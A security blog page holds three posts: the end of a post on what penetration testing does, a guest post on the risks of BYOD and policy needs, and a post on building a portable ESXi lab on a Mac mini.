IMPORTANT: One popular misconception is that a Penetration Testing service enhances IT security because it costs more than other security services. Penetration Testing does not by itself make IT networks more secure: the service evaluates existing security! A customer should not consider a penetration test while there is reason to believe the target is not yet completely secured; the known gaps should be fixed first.

Hopefully these definitions help define future security service requests.



Filed under General Security

The Importance of a BYOD Policy for Companies

Here is a guest post from Pierluigi Paganini. He is a security researcher for InfoSec Institute. InfoSec Institute is an information security training company now offering a mobile computer forensics course.

The IT landscape is dominated by the rise of paradigms such as cloud computing, mobile networking and social networking, three concepts that have completely transformed the daily user's experience of the web.

Users, more or less consciously, have become dependent on mobility and connectivity; technological change has been rapid and has involved masses of people as never before. There are a billion people acting as nodes in a global network and exchanging an unimaginable quantity of data, while ignoring the basic concepts of information security:

- What means are used to transfer the data?
- Are the communication channels secure?
- Where is the user's information hosted?
- What is the impact on users' privacy, and what is the impact of technological innovation on business?

All of these questions need careful reflection to avoid serious consequences for our data, for our digital identities, for our business.

Every day we read the word "BYOD" in many articles, but how much do we know about it?

BYOD is an acronym for "bring your own device" and refers to employees, business partners and other users bringing their own mobile computing devices, such as laptops, tablets and smartphones, to the workplace for use and connectivity on the corporate network and for access to business data. The repercussions, from a security perspective, are extremely serious, because the absence of proper policies regulating the use of these devices exposes both users and the company to data leaks and cyber attacks.

These policies have to address the ways in which employees may use the devices outside the workplace, the access-protection mechanisms to be adopted, data encryption, which data is accessible from the mobile platform, and limits on the applications that can be run outside the company (e.g., email clients or data mining applications).

Suggestions for a secure BYOD policy

The proper management of mobile devices, and of their use by employees outside the workplace, is a critical aspect of enterprise security. Companies today may choose to comply with different standards and regulations; the majority of them, such as ISO 27001, already cover many aspects that can improve a BYOD policy.

Because the presence of mobile devices inside companies and government agencies has increased at an impressive rate, ordinary business relationships with other enterprises, such as clients and providers, require the definition and adoption of a proper BYOD policy. Sophos published a document titled "BYOD Risks and Rewards" which reports that one in four devices used for work today is either a smartphone or a tablet.

Figure 1 – Sophos BYOD Survey

The SANS (SysAdmin, Audit, Networking, and Security) Institute published the whitepaper "SANS Mobility/BYOD Security Survey" in March 2012. The survey found that "only 9 percent of respondents felt completely aware of all mobile devices accessing their enterprise infrastructure and applications. At the same time, nearly 40 % felt they were fully aware of their devices, while nearly half did not have the level of awareness that they should."

Figure 2 – SANS Institute -State of Mobile Devices Awareness




Filed under General Security

My Awesome Portable Lab – Apple Mac mini Running ESXI 5.0 5.1 hosting Cisco ISE, NCS, Backtrack, Lancope and More

Part of my job is being an expert on various technologies. This means having hands-on experience with the latest products as well as the ability to demonstrate how specific solutions work. Many vendors are virtualizing their solutions, making it easier to build a home lab that is portable and light on power usage. My team has researched the best option for a mobile home lab based on price, size, power consumption and noise. After comparing various servers and laptops, we found the Apple Mac mini to be the best choice. It's small enough to fit in a backpack, low on power consumption, silent, and around $1,400 fully loaded.

The Mac mini is 7.7 by 7.7 inches and comes with the standard Apple OS and an HDMI display adapter. Some monitors may need a VGA adapter, which can be purchased for $10-25. You will need an Apple SuperDrive to load the ESXi ISO and possibly some drivers that are lost during the install, depending on your Mac mini model and install method. I've heard of people doing it with other media such as USB storage; however, I've personally only used the SuperDrive for two different Mac minis. Make sure to have a USB mouse and keyboard as well.

This website covers how to install ESXi 5.x on an older Mac mini (2011 or older) HERE. The steps are very straightforward; however, one lesson learned is that you HAVE TO burn the driver disk that will be mounted from a Windows computer. I wasted a dozen CDs burning the drivers with my Mac using various tools, yet the CD never mounted. You can use any type of device to burn the ESXi software itself.




Filed under Datacenter, General Security